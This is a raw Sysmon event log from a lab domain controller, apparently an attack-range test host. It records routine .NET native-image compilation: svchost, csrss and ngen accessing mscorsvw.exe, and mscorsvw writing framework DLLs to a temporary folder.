13:48:32.591{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed4-0\System.dll2021-01-18 13:48:32.591 10341000x80000000000000007224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.716{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.716{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.325{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.310{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:33.310{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B1-6005-0003-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.732{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.716{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.716{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.466{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.450{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.450{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:37.247{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1238-0\System.Xml.dll2021-01-18 13:48:37.247 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:42.794{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:42.778{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:42.778{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:42.559{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11b8-0\System.Core.dll2021-01-18 13:48:42.559 10341000x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.528{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.513{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.513{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.356{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.356{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:43.278{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\102c-0\System.Configuration.dll2021-01-18 13:48:43.278 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.888{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.872{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 